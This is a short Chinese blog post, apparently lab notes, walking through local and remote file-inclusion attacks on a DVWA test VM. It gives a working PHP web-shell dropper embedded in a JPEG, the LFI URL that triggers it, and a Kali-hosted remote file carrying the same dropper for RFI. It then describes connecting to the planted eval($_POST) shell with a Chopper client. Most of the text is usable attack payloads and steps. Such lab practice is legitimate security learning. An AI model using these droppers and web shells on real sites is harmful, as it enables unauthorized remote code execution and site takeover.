1.本地文件包含漏洞
下载一个图片,尽量小点,否则可能传不上去
图片使用工具edjpgcom写入:<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangge]);?>')?>
在文件包含漏洞页面会执行图片里的php命令,会在fi文件夹下生成php文件shell20.php,把后半部分写到这个php文件
上传图片,访问:
http://192.168.204.133/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/yinyangt.jpg (在本地访问一直提示ERROR: File not found!没有生成php,在windows虚拟机可以)
然后用菜刀连接http://192.168.204.133/dvwa/vulnerabilities/fi/shell20.php 密码是木马里的yangge
2.远程文件包含
需要一个远程web服务器,kali上启动了apache
kali@kali:~$ systemctl start apache2
kali@kali:~$ systemctl status apache2
在/var/www/html下创建文件yangge.txt:
root@kali:/var/www/html# pwd
/var/www/html
root@kali:/var/www/html# ls -l
total 20
-rw-r--r-- 1 root root 10701 May 8 2020 index.html
-rw-r--r-- 1 root root 612 May 8 2020 index.nginx-debian.html
-rw-r--r-- 1 root root 70 Oct 29 00:48 yangge.txt
root@kali:/var/www/html# cat yangge.txt
<?fputs(fopen("shell50.php","w"),'<?php eval($_POST[yangge50]);?>')?>
root@kali:/var/www/html#
然后在文件包含漏洞url后填写远程地址访问
可以看到在以下路径生成了php文件
标签:文件,www,包含,--,kali,html,php,root From: https://www.cnblogs.com/yitian395/p/16838538.html